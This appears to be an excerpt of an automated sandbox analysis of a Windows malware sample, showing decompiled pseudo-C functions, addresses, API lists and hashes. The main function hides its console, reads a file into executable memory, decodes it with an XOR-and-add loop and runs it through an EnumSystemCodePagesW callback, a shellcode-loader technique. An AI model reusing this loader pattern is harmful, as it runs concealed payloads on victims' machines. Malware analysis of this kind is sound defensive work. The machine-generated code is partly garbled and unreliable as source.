							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							 *(_t33 + 0x18) = 0xfffffffe;
							_t20 =  *0x456b04; // 0x6c2f60
							if(_t20 != 0) {
								_t20 =  *(_t20 + _t31 * 4);
								 *(_t20 + 0x10) = 0xfffffffe;
							}
						} else {
							_t20 = _t25 & 0x000000ff;
							 *(_t33 + 0x18) = _t28;
							if(_t20 != 2) {
								if(_t20 == 3) {
									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
								}
							} else {
								 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							}
						}
					} else {
						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
					}
					_t31 = _t31 + 1;
				} while (_t31 != 3);
				return _t20;
			}

0x00430619
0x0043061b
0x0043061f
0x00430628
0x00430633
0x00430643
0x00430647
0x0043064a
0x0043065c
0x0043064c
0x0043064f
0x00430658
0x00430651
0x00430654
0x00430654
0x0043064f
0x0043065e
0x00430666
0x0043066b
0x0043067a
0x00430671
0x00430672
0x00430672
0x0043067e
0x0043069c
0x004306a0
0x004306a7
0x004306ae
0x004306b0
0x004306b3
0x004306b3
0x00430680
0x00430680
0x00430683
0x00430689
0x00430694
0x00430696
0x00430696
0x0043068b
0x0043068b
0x0043068b
0x00430689
0x0043063b
0x0043063b
0x0043063b
0x004306ba
0x004306bb
0x004306c7

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00430660
GetFileType.KERNELBASE(00000000), ref: 00430672

Strings

`/l, xrefs: 004306A7

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: FileHandleType
String ID: `/l
API String ID: 3000768030-3784181548
Opcode ID: b8ae36043831b15d32f7aeb87c33ec3c5b6ef5a42dafd5c4026a1be7abf9e6a8
Instruction ID: 51995d775eaa47ce5c57ddf3575f52e9937b4040c66579005631198defe87f15
Opcode Fuzzy Hash: b8ae36043831b15d32f7aeb87c33ec3c5b6ef5a42dafd5c4026a1be7abf9e6a8
Instruction Fuzzy Hash: 2C11E4712047414AC7304A3E8CAA2237A95A7DE330F38271BD1B6C76F9C238D8A6964D

Uniqueness

Uniqueness Score: -1.00%

Function 00432F7B Relevance: 4.5, APIs: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00432F7B() {
				void* _t3;
				void* _t16;
				WCHAR* _t17;

				_t17 = GetEnvironmentStringsW();
				if(_t17 != 0) {
					_t11 = E00432EB3(_t17) - _t17 & 0xfffffffe;
					_t3 = E0042E2FC(E00432EB3(_t17) - _t17 & 0xfffffffe); // executed
					_t16 = _t3;
					if(_t16 != 0) {
						E00408CA0(_t16, _t17, _t11);
					}
					E0042E2C2(0);
					FreeEnvironmentStringsW(_t17);
				} else {
					_t16 = 0;
				}
				return _t16;
			}

0x00432f85
0x00432f89
0x00432f9a
0x00432f9e
0x00432fa3
0x00432fa9
0x00432fae
0x00432fb3
0x00432fb8
0x00432fbf
0x00432f8b
0x00432f8b
0x00432f8b
0x00432fca

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00432F7F
_free.LIBCMT ref: 00432FB8
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00432FBF

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: EnvironmentStrings$Free_free
String ID:
API String ID: 2716640707-0
Opcode ID: 4fa6a22a12e6e2167a6e56d8a381d0c586fb92e2472f86d758ec5cec76b11b38
Instruction ID: 25edfb29878ef016c232bd9e178b3338e1ef86d9f088a5f3615588fc73734b3e
Opcode Fuzzy Hash: 4fa6a22a12e6e2167a6e56d8a381d0c586fb92e2472f86d758ec5cec76b11b38
Instruction Fuzzy Hash: 62E09B3B70DA3176A221273B7D8A9AB261DDFC67B4B25112BF41552282AE9D4C0210BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040645A Relevance: 3.0, APIs: 2, Instructions: 47
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040645A(void* __eax, void* __ebx, void* __edi, void* __eflags, intOrPtr _a8, signed short _a12245929) {
				int _v8;
				void* _v12;
				signed int _v16;
				WCHAR* _v20;
				void* _v24;
				int _v28;
				void* _v32;
				WCHAR* _v36;
				int _v40;
				char _v44;
				signed short* _v48;
				long _v52;
				long _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				signed int _v68;
				int _v72;
				int _v76;
				signed int _v80;
				int _v84;
				int _v88;
				intOrPtr _v92;
				long _v96;
				long _v100;
				void* _v104;
				long _v108;
				long _v112;
				long _v116;
				signed char* _v120;
				long _v124;
				signed char* _v128;
				long _v132;
				signed char* _v136;
				long _v140;
				signed char* _v144;
				long _v148;
				signed char* _v152;
				long _v156;
				signed char* _v160;
				long _v164;
				signed char* _v168;
				long _v172;
				signed char* _v176;
				long _v180;
				signed char* _v184;
				long _v188;
				signed char* _v192;
				long _v196;
				short _v204;
				int _v208;
				long _v212;
				char _v220;
				char _v228;
				struct _STARTUPINFOW _v296;
				char _v348;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				char _v632;
				short _v1152;
				short _v3200;
				short _v19584;
				struct HWND__* _t407;
				int _t409;
				void* _t413;
				void* _t415;
				long _t459;
				long _t461;
				int _t463;
				void* _t470;
				signed char* _t475;
				long _t480;
				intOrPtr _t496;
				char _t525;
				long _t548;
				long _t554;
				long _t562;
				signed char* _t573;
				signed char* _t579;
				intOrPtr _t587;
				signed char* _t591;
				WCHAR* _t607;
				void* _t619;
				int _t620;
				int _t622;
				void* _t624;
				signed short _t628;
				signed char* _t685;
				int _t687;
				signed char* _t691;
				signed int _t693;
				signed char* _t717;
				signed char* _t721;
				signed char* _t726;
				signed char* _t728;
				signed char* _t732;
				signed char* _t742;
				signed char* _t816;
				signed char* _t843;
				signed char* _t847;
				signed char* _t851;
				signed char* _t855;
				signed char* _t875;
				signed char* _t877;
				void* _t905;
				void* _t909;
				void* _t910;
				void* _t912;
				void* _t913;
				void* _t914;
				void* _t915;
				void* _t919;

				_t904 = __edi;
				asm("int3");
				_t910 = _t912;
				_t407 = E00407800(0x4c7c);
				_v48 = 0;
				_v24 = 0;
				_v116 = 1;
				_v68 = 0;
				_v28 = 0;
				_v208 = 0;
				_v8 = 0;
				_v76 = 0;
				__imp__GetConsoleWindow(_t905, _t909); // executed
				ShowWindow(_t407, 0); // executed
				_push(0x3d0900); // executed
				_t409 = E00413B7B(); // executed
				_t913 = _t912 + 4;
				_v76 = _t409;
				if(_v76 != 0) {
					E004097A0(__edi, _v76, 0x54, 0x3d0900);
					_t914 = _t913 + 0xc;
					_t413 = CreateFileW( *(_a8 + (4 << 0)), 0x80000000, 1, 0, 3, 0x80, 0); // executed
					_v104 = _t413;
					_v96 = GetFileSize(_v104, 0);
					_t415 = VirtualAlloc(0, _v96, 0x3000, 0x40); // executed
					_v12 = _t415;
					ReadFile(_v104, _v12, _v96,  &_v212, 0); // executed
					goto L4;
					do {
						L9:
						_t685 =  *0x4494a8; // 0x4533bc
						if(( *_t685 & 8) != 0) {
							_t475 =  *0x4494a8; // 0x4533bc
							_v120 = _t475;
							_v124 = 3;
							E00406000(_v124, _v120, "wmain", "Full commandline \'%s\'\n", E00406150(_v48));
							_t919 = _t919 + 0x14;
						}
					} while (0 != 0);
					L17:
					while(( *_v16 & 0x0000ffff) != 0) {
						if(( *_v16 & 0x0000ffff) == 0x2f) {
							_t628 = E004135D1( *(_v16 + (2 << 0)) & 0x0000ffff);
							_t919 = _t919 + 4;
							_v80 = _t628 & 0x0000ffff;
							_v80 = _v80 - 0x61;
							if(_v80 > 0x15) {
								L33:
								if( *0x454c2c != 0 ||  *0x454c30 != 0) {
									_v16 = _v16 + 4;
									L37:
									while(( *_v16 & 0x0000ffff) != 0) {
										_t624 = E004088E2(L" \t,=;",  *_v16 & 0x0000ffff);
										_t919 = _t919 + 8;
										if(_t624 == 0) {
											break;
										}
										_v16 = _v16 + 2;
									}
									if(_v100 != 0) {
										0x400000(L"OFF");
									}
									 *0x456ef0 = 0;
									SetEnvironmentVariableW(L"PROMPT", L"$P$G");
									if( *0x454c2c != 0 ||  *0x454c30 != 0) {
										_v84 = 0;
										_v88 = 0;
										_v24 = E00405D10(_v16);
										if( *0x454c34 == 0) {
											_t622 = E004088E2(_v16, 0x22);
											_t919 = _t919 + 8;
											_v84 = _t622;
											if(_v84 == 0) {
												 *0x454c34 = 1;
											}
										}
										if( *0x454c34 == 0) {
											_t620 = E004088E2(_v84 + 2, 0x22);
											_t919 = _t919 + 8;
											_v88 = _t620;
											if(_v88 == 0) {
												 *0x454c34 = 1;
											}
										}
										if( *0x454c34 == 0) {
											_t619 = E004088E2(_v88 + 2, 0x22);
											_t919 = _t919 + 8;
											if(_t619 != 0) {
												 *0x454c34 = 1;
											}
										}
										if( *0x454c34 != 0) {
											L69:
											_t816 =  *0x4494a8; // 0x4533bc
											if(( *_t816 & 8) != 0) {
												_t691 =  *0x4494a8; // 0x4533bc
												_v128 = _t691;
												_v132 = 3;
												E00406000(_v132, _v128, "wmain", "/c command line: \'%s\'\n", E00406150(_v24));
												_t919 = _t919 + 0x14;
											}
										} else {
											 *0x454c34 = 1;
											_v20 = _v84;
											while(_v20 != _v88) {
												if(( *_v20 & 0x0000ffff) == 0x26 || ( *_v20 & 0x0000ffff) == 0x3c || ( *_v20 & 0x0000ffff) == 0x3e || ( *_v20 & 0x0000ffff) == 0x28 || ( *_v20 & 0x0000ffff) == 0x29 || ( *_v20 & 0x0000ffff) == 0x40 || ( *_v20 & 0x0000ffff) == 0x5e || ( *_v20 & 0x0000ffff) == 0x7c) {
													 *0x454c34 = 1;
													do {
														goto L69;
													} while (0 != 0);
													if( *0x454c34 != 0) {
														L125:
														if( *0x454c34 != 0 && ( *_v24 & 0x0000ffff) == 0x22) {
															E004056C0(_v24);
														}
														goto L128;
													}
													_t548 = _v24;
													0x400000(_t548, 0, 0, 0, 1);
													_v60 = _t548;
													_v52 = 0;
													0x400000( &_v19584);
													_v108 = GetEnvironmentVariableW(L"PATHEXT",  &_v19584, _t548);
													if(_v108 == 0) {
														L75:
														lstrcpyW( &_v19584, L".bat;.com;.cmd;.exe");
														do {
															L76:
															_t847 =  *0x4494a8; // 0x4533bc
															if(( *_t847 & 8) != 0) {
																_t717 =  *0x4494a8; // 0x4533bc
																_v136 = _t717;
																_v140 = 3;
																E00406000(_v140, _v136, "wmain", "First parameter is \'%s\'\n", E00406150(_v60));
																_t919 = _t919 + 0x14;
															}
														} while (0 != 0);
														_t554 = E004088E2(_v60, 0x5c);
														_t919 = _t919 + 8;
														if(_t554 == 0) {
															0x400000(0);
															if(SearchPathW(0, _v60, 0, _t554,  &_v3200,  &_v3200) == 0) {
																_v64 =  &_v19584;
																while(_v52 == 0 && _v64 != 0) {
																	_t562 = E004088E2(_v64, 0x3b);
																	_t919 = _t919 + 8;
																	_v56 = _t562;
																	if(_v56 == 0) {
																		_v56 = 0;
																	} else {
																		 *_v56 = 0;
																		_t562 = _v56 + 2;
																		_v56 = _t562;
																	}
																	0x400000(0);
																	if(SearchPathW(0, _v60, _v64, _t562,  &_v3200,  &_v3200) == 0) {
																		L119:
																		_v64 = _v56;
																		continue;
																	} else {
																		do {
																			_t855 =  *0x4494a8; // 0x4533bc
																			if(( *_t855 & 8) != 0) {
																				_t726 =  *0x4494a8; // 0x4533bc
																				_v176 = _t726;
																				_v180 = 3;
																				_push(E00406150(_v64));
																				E00406000(_v180, _v176, "wmain", "Found on path as \'%s\' with extension \'%s\'\n", E00406150( &_v3200));
																				_t919 = _t919 + 0x18;
																			}
																		} while (0 != 0);
																		_v52 = 1;
																		goto L119;
																	}
																}
																L120:
																if(_v52 != 0) {
																	goto L125;
																} else {
																	goto L121;
																}
																do {
																	L121:
																	_t851 =  *0x4494a8; // 0x4533bc
																	if(( *_t851 & 8) != 0) {
																		_t721 =  *0x4494a8; // 0x4533bc
																		_v184 = _t721;
																		_v188 = 3;
																		_push("Binary not found, dropping back to old behaviour\n");
																		_push("wmain");
																		_push(_v184);
																		_push(_v188);
																		E00406000();
																		_t919 = _t919 + 0x10;
																	}
																} while (0 != 0);
																 *0x454c34 = 1;
																goto L125;
															} else {
																goto L104;
															}
															do {
																L104:
																_t728 =  *0x4494a8; // 0x4533bc
																if(( *_t728 & 8) != 0) {
																	_t573 =  *0x4494a8; // 0x4533bc
																	_v168 = _t573;
																	_v172 = 3;
																	E00406000(_v172, _v168, "wmain", "Found on path as \'%s\'\n", E00406150( &_v3200));
																	_t919 = _t919 + 0x14;
																}
															} while (0 != 0);
															_v52 = 1;
															goto L120;
														}
														0x400000(0);
														if(E00403F90( &_v3200, _v60, _t554,  &_v3200,  &_v3200) != 0) {
															do {
																_t732 =  *0x4494a8; // 0x4533bc
																if(( *_t732 & 8) != 0) {
																	_t579 =  *0x4494a8; // 0x4533bc
																	_v144 = _t579;
																	_v148 = 3;
																	E00406000(_v148, _v144, "wmain", "Full path name \'%s\'\n", E00406150( &_v3200));
																	_t919 = _t919 + 0x14;
																}
															} while (0 != 0);
															_v20 = _t910 + lstrlenW( &_v3200) * 2 - 0xc7c;
															if(GetFileAttributesW( &_v3200) == 0xffffffff) {
																_v36 =  &_v19584;
																while(_v52 == 0 && _v36 != 0) {
																	_t587 = E004088E2(_v36, 0x3b);
																	_t919 = _t919 + 8;
																	_v92 = _t587;
																	if(_v92 == 0) {
																		lstrcpyW(_v20, _v36);
																		_v36 = 0;
																	} else {
																		E00408CA0(_v20, _v36, _v92 - _v36 >> 1 << 1);
																		_t919 = _t919 + 0xc;
																		_v20[_v92 - _v36 >> 1] = 0;
																		_v36 = _v92 + 2;
																	}
																	if(GetFileAttributesW( &_v3200) == 0xffffffff) {
																		L101:
																		continue;
																	} else {
																		do {
																			_t591 =  *0x4494a8; // 0x4533bc
																			if(( *_t591 & 8) != 0) {
																				_t875 =  *0x4494a8; // 0x4533bc
																				_v160 = _t875;
																				_v164 = 3;
																				E00406000(_v164, _v160, "wmain", "Found file as \'%s\'\n", E00406150( &_v3200));
																				_t919 = _t919 + 0x14;
																			}
																		} while (0 != 0);
																		_v52 = 1;
																		goto L101;
																	}
																}
																L102:
																goto L120;
															} else {
																goto L86;
															}
															do {
																L86:
																_t877 =  *0x4494a8; // 0x4533bc
																if(( *_t877 & 8) != 0) {
																	_t742 =  *0x4494a8; // 0x4533bc
																	_v152 = _t742;
																	_v156 = 3;
																	E00406000(_v156, _v152, "wmain", "Found file as \'%s\'\n", E00406150( &_v3200));
																	_t919 = _t919 + 0x14;
																}
															} while (0 != 0);
															_v52 = 1;
															goto L102;
														}
														_t496 = 0;
														goto L174;
													}
													_t607 =  &_v19584;
													0x400000(_t607);
													if(_v108 < _t607) {
														goto L76;
													}
													goto L75;
												} else {
													if(( *_v20 & 0x0000ffff) == 0x20 || ( *_v20 & 0x0000ffff) == 9) {
														 *0x454c34 = 0;
													}
													_v20 =  &(_v20[1]);
													continue;
												}
											}
											goto L69;
										}
									} else {
										L128:
										0x400000( &_v3200);
										GetCurrentDirectoryW( &_v3200,  &_v3200);
										_t693 = 2;
										if(IsCharAlphaW( *(_t910 + 0xfffffffffffff384) & 0x0000ffff) == 0) {
											L134:
											if( *0x454c2c == 0) {
												GetStartupInfoW( &_v296);
												if(_v296.lpTitle == 0) {
													SetConsoleTitleW(E004011B0(_t490, 0x408));
												} else {
													SetConsoleTitleW(_v296.lpTitle);
												}
												if(_v68 == 0) {
													_v44 = 0;
													_v40 = 4;
													if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Command Processor", 0, 0x20019,  &_v32) == 0) {
														if(RegQueryValueExW(_v32, L"DefaultColor", 0,  &_v72, 0, 0) == 0) {
															if(_v72 != 4) {
																if(_v72 == 1) {
																	_v40 = 8;
																	RegQueryValueExW(_v32, L"DefaultColor", 0, 0,  &_v220,  &_v40);
																	_t525 = E00415A03( &_v220,  &_v220, 0, 0xa);
																	_t919 = _t919 + 0xc;
																	_v44 = _t525;
																}
															} else {
																_v40 = 4;
																RegQueryValueExW(_v32, L"DefaultColor", 0, 0,  &_v44,  &_v40);
															}
														}
														RegCloseKey(_v32);
													}
													if(_v44 == 0 && RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Command Processor", 0, 0x20019,  &_v32) == 0) {
														if(RegQueryValueExW(_v32, L"DefaultColor", 0,  &_v72, 0, 0) == 0) {
															if(_v72 != 4) {
																if(_v72 == 1) {
																	_v40 = 8;
																	RegQueryValueExW(_v32, L"DefaultColor", 0, 0,  &_v228,  &_v40);
																	_v44 = E00415A03(_v32,  &_v228, 0, 0xa);
																}
															} else {
																_v40 = 4;
																RegQueryValueExW(_v32, L"DefaultColor", 0, 0,  &_v44,  &_v40);
															}
														}
														RegCloseKey(_v32);
													}
													_t697 = (_v44 & 0x000000f0) >> 4;
													if((_v44 & 0x000000f0) >> 4 != (_v44 & 0x0000000f)) {
														 *0x4533cc = _v44 & 0x000000ff;
														_t697 = 2;
														 *0x0045B1C0 = 0;
														0x400000();
													}
												} else {
													_t697 = _v68 & 0x0000000f;
													if((_v68 & 0x000000f0) >> 4 != (_v68 & 0x0000000f)) {
														 *0x4533cc = _v68 & 0x000000ff;
														_t697 = 0;
														 *((short*)(0x45b1c0)) = 0;
														0x400000();
													}
												}
												if( *0x454c30 != 0) {
													E00401240( &_v28, _t904, _v24,  &_v28, 0xffffffff);
													E00404890(_t904, _v28, 0, 0);
													_t697 = _v28;
													E00403F40(_v28, _v28);
													_v28 = 0;
													0x400000(_v24);
												}
												 *0x456ef0 = 1;
												if( *0x454c30 == 0) {
													0x400000();
												}
												while(1 != 0) {
													if( *0x4533d0 != 0) {
														_t697 = _v116;
														E00405220(_t904, _v116);
													}
													if(E00401240(_t697, _t904, 0,  &_v28, GetStdHandle(0xfffffff6)) != 0) {
														E00404890(_t904, _v28, 0, 0);
														_t697 = _v28;
														E00403F40(_v28, _v28);
														if(_v28 == 0) {
															_v112 = 0;
														} else {
															_v112 = 1;
														}
														_v116 = _v112;
														_v28 = 0;
														continue;
													} else {
														break;
													}
												}
												_t496 = 0;
												goto L174;
											}
											E00401240(_t693, _t904, _v24,  &_v28, 0xffffffff);
											E00404890(_t904, _v28, 0, 0);
											E00403F40(_v28, _v28);
											_v28 = 0;
											0x400000(_v24);
											_t496 =  *0x457190;
											goto L174;
										}
										_t693 = 2 << 0;
										if((_a12245929 & 0x0000ffff) != 0x3a) {
											goto L134;
										}
										wsprintfW( &_v204, L"=%c:",  *(_t910 + 0xfffffffffffff384) & 0x0000ffff);
										_t919 = _t919 + 0xc;
										SetEnvironmentVariableW( &_v204,  &_v3200);
										do {
											_t490 =  *0x4494a8; // 0x4533bc
											if(( *_t490 & 8) != 0) {
												_t843 =  *0x4494a8; // 0x4533bc
												_v192 = _t843;
												_v196 = 3;
												_push(E00406150( &_v3200));
												_t490 = E00406000(_v196, _v192, "wmain", "Set %s to %s\n", E00406150( &_v204));
												_t919 = _t919 + 0x18;
											}
											_t693 = 0;
										} while (0 != 0);
										goto L134;
									}
								} else {
									L16:
									_v16 = _v16 + 2;
									continue;
								}
							}
							_t148 = _v80 + 0x407564; // 0x5025ff07
							switch( *((intOrPtr*)(( *_t148 & 0x000000ff) * 4 +  &M00407540))) {
								case 0:
									 *0x454c38 = 0;
									goto L33;
								case 1:
									 *0x454c2c = 1;
									goto L33;
								case 2:
									 *0x454c30 = 1;
									goto L33;
								case 3:
									_v100 = 1;
									goto L33;
								case 4:
									 *0x454c34 = 1;
									goto L33;
								case 5:
									__ecx = 2;
									__ecx = 2 << 1;
									__eax =  *(_v16 + (2 << 1)) & 0x0000ffff;
									if(__eax == 0x3a) {
										__ecx = 2;
										__eax = E00415A03(2, 6 + _v16, 0, 0x10);
										_v68 = __eax;
									}
									goto L33;
								case 6:
									 *0x454c38 = 1;
									goto L33;
								case 7:
									__eax = 2;
									__eax = 2 << 1;
									__ecx = _v16;
									if(( *(__ecx + (2 << 1)) & 0x0000ffff) == 0x3a) {
										__eax = 2;
										6 = 6 + _v16;
										__eax = E0042B7E2(__ebx, __edi, __esi, 6 + _v16, L"OFF", 3);
										 *0x454c28 = __eax;
									}
									goto L33;
								case 8:
									goto L33;
							}
						}
						goto L16;
					}
					goto L37;
					L12:
					if(( *_v48 & 0x0000ffff) == 0 || ( *_v48 & 0x0000ffff) == 0x2f) {
						 *0x454c34 = 0;
						_t687 =  *0x454c34; // 0x0
						_v100 = _t687;
						 *0x454c30 = _v100;
						_t480 =  *0x454c30; // 0x0
						 *0x454c2c = _t480;
						_v16 = _v48;
						goto L17;
					} else {
						_v48 =  &(_v48[1]);
						goto L12;
					}
					L4:
					 *(_v12 + _v8) =  *(_v12 + _v8) ^ 0x00000002;
					 *(_v12 + _v8) =  *(_v12 + _v8) + 0x11;
					 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
					 *(_v12 + _v8) =  *(_v12 + _v8) + 0x80;
					 *(_v12 + _v8) =  *(_v12 + _v8) ^ 0x00000042;
					 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
					 *(_v12 + _v8) =  *(_v12 + _v8) ^ 0x0000002f;
					 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
					 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
					 *(_v12 + _v8) =  *(_v12 + _v8) ^ 0x00000093;
					 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
					 *(_v12 + _v8) =  *(_v12 + _v8) + 0xf6;
					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
					 *(_v12 + _v8) =  *(_v12 + _v8) ^ 0x0000005e;
					 *(_v12 + _v8) =  *(_v12 + _v8) + 0x22;
					 *(_v12 + _v8) =  *(_v12 + _v8) ^ 0x000000a0;
					_v8 = _v8 + 1;
					if(_v8 >= _v96) {
						EnumSystemCodePagesW(_v12, 0); // executed
						_t682 = _v76;
						_t459 = E00413B60(_v76);
						_t915 = _t914 + 4;
						0x400000( &_v1152);
						_t461 = GetEnvironmentVariableW(L"COMSPEC",  &_v1152, _t459);
						if(_t461 == 0) {
							0x400000( &_v1152);
							0x400000(L"\\cmd.exe");
							GetSystemDirectoryW( &_v1152, _t461 - _t461);
							lstrcatW( &_v1152, L"\\cmd.exe");
							_t682 =  &_v1152;
							SetEnvironmentVariableW(L"COMSPEC",  &_v1152);
						}
						_t463 = E00415AA2(_t682, E00405F90(0));
						_v632 = 0x11c;
						0x400000( &_v632);
						lstrcpyW(0x456fe0, E004011B0(_t463, 0x407));
						_push(_v620);
						_push(_v624);
						_t470 = E00403E90(E004011B0(E00405F50( &_v348, "%ld.%ld.%ld", _v628), 0x409),  &_v348);
						_t919 = _t915 + 0x24;
						_v24 = _t470;
						lstrcpyW(0x456f00, _v24);
						LocalFree(_v24);
						_v24 = 0;
						_v48 = GetCommandLineW();
						goto L9;
					} else {
						goto L4;
					}
				} else {
					_t496 = 0;
					L174:
					return _t496;
				}
			}

0x0040645a
0x004064af
0x004064b1
0x004064b8
0x004064be
0x004064c5
0x004064cc
0x004064d3
0x004064da
0x004064e1
0x004064eb
0x004064f2
0x004064fb
0x00406502
0x00406508
0x0040650d
0x00406512
0x00406515
0x0040651c
0x00406530
0x00406535
0x00406559
0x0040655f
0x0040656e
0x0040657e
0x00406584
0x0040659c
0x0040659c
0x0040686c
0x0040686c
0x0040686c
0x00406878
0x0040687a
0x0040687f
0x00406882
0x004068a5
0x004068aa
0x004068aa
0x004068ad
0x00000000
0x00406908
0x00406928
0x0040693c
0x00406941
0x00406947
0x00406950
0x00406957
0x00406a1f
0x00406a26
0x00406a37
0x00000000
0x00406a41
0x00406a57
0x00406a5c
0x00406a61
0x00000000
0x00000000
0x00406a69
0x00406a69
0x00406a72
0x00406a79
0x00406a79
0x00406a7e
0x00406a92
0x00406a9f
0x00406aae
0x00406ab5
0x00406ac5
0x00406acf
0x00406ad7
0x00406adc
0x00406adf
0x00406ae6
0x00406ae8
0x00406ae8
0x00406ae6
0x00406af9
0x00406b04
0x00406b09
0x00406b0c
0x00406b13
0x00406b15
0x00406b15
0x00406b13
0x00406b26
0x00406b31
0x00406b36
0x00406b3b
0x00406b3d
0x00406b3d
0x00406b3b
0x00406b4e
0x00406c02
0x00406c02
0x00406c0e
0x00406c10
0x00406c16
0x00406c19
0x00406c3c
0x00406c41
0x00406c41
0x00406b54
0x00406b54
0x00406b61
0x00406b64
0x00406b79
0x00406bc8
0x00406c02
0x00000000
0x00000000
0x00406c4f
0x004070eb
0x004070f2
0x00407103
0x00407103
0x00000000
0x004070f2
0x00406c5d
0x00406c61
0x00406c66
0x00406c69
0x00406c77
0x00406c8f
0x00406c96
0x00406ca9
0x00406cb5
0x00406cbb
0x00406cbb
0x00406cbb
0x00406cc7
0x00406cc9
0x00406ccf
0x00406cd5
0x00406d01
0x00406d06
0x00406d06
0x00406d09
0x00406d13
0x00406d18
0x00406d1d
0x00406f32
0x00406f48
0x00406fb0
0x00406fb3
0x00406fcd
0x00406fd2
0x00406fd5
0x00406fdc
0x00406ff1
0x00406fde
0x00406fe3
0x00406fe9
0x00406fec
0x00406fec
0x00407008
0x00407020
0x00407088
0x0040708b
0x00000000
0x00407022
0x00407022
0x00407022
0x0040702e
0x00407030
0x00407036
0x0040703c
0x0040704f
0x00407075
0x0040707a
0x0040707a
0x0040707d
0x00407081
0x00000000
0x00407081
0x00407020
0x00407093
0x00407097
0x00000000
0x00000000
0x00000000
0x00000000
0x00407099
0x00407099
0x00407099
0x004070a5
0x004070a7
0x004070ad
0x004070b3
0x004070bd
0x004070c2
0x004070cd
0x004070d4
0x004070d5
0x004070da
0x004070da
0x004070dd
0x004070e1
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f4a
0x00406f4a
0x00406f4a
0x00406f56
0x00406f58
0x00406f5d
0x00406f63
0x00406f92
0x00406f97
0x00406f97
0x00406f9a
0x00406f9e
0x00000000
0x00406f9e
0x00406d33
0x00406d44
0x00406d4d
0x00406d4d
0x00406d59
0x00406d5b
0x00406d60
0x00406d66
0x00406d95
0x00406d9a
0x00406d9a
0x00406d9d
0x00406db5
0x00406dc8
0x00406e31
0x00406e34
0x00406e4e
0x00406e53
0x00406e56
0x00406e5d
0x00406e9e
0x00406ea4
0x00406e5f
0x00406e72
0x00406e77
0x00406e87
0x00406e91
0x00406e91
0x00406ebb
0x00406f18
0x00000000
0x00406ebd
0x00406ebd
0x00406ebd
0x00406ec8
0x00406eca
0x00406ed0
0x00406ed6
0x00406f05
0x00406f0a
0x00406f0a
0x00406f0d
0x00406f11
0x00000000
0x00406f11
0x00406ebb
0x00406f1d
0x00000000
0x00000000
0x00000000
0x00000000
0x00406dca
0x00406dca
0x00406dca
0x00406dd6
0x00406dd8
0x00406dde
0x00406de4
0x00406e13
0x00406e18
0x00406e18
0x00406e1b
0x00406e1f
0x00000000
0x00406e1f
0x00406d46
0x00000000
0x00406d46
0x00406c98
0x00406c9f
0x00406ca7
0x00000000
0x00000000
0x00000000
0x00406bd4
0x00406bdd
0x00406bea
0x00406bea
0x00406bfa
0x00000000
0x00406bfa
0x00406b79
0x00000000
0x00406b64
0x00407108
0x00407108
0x00407116
0x0040711c
0x00407122
0x0040713b
0x004071f5
0x004071fc
0x00407244
0x00407251
0x0040726d
0x00407253
0x0040725a
0x0040725a
0x00407277
0x004072b8
0x004072bf
0x004072e3
0x00407304
0x0040730a
0x00407334
0x00407336
0x00407355
0x00407366
0x0040736b
0x0040736e
0x0040736e
0x0040730c
0x0040730c
0x00407328
0x00407328
0x0040730a
0x00407375
0x00407375
0x0040737f
0x004073c3
0x004073c9
0x004073f3
0x004073f5
0x00407414
0x0040742d
0x0040742d
0x004073cb
0x004073cb
0x004073e7
0x004073e7
0x004073c9
0x00407434
0x00407434
0x00407443
0x0040744e
0x00407458
0x0040745d
0x00407467
0x0040746e
0x0040746e
0x00407279
0x00407287
0x0040728c
0x00407297
0x004072a2
0x004072a7
0x004072ae
0x004072ae
0x004072b3
0x0040747a
0x00407486
0x00407493
0x00407498
0x0040749c
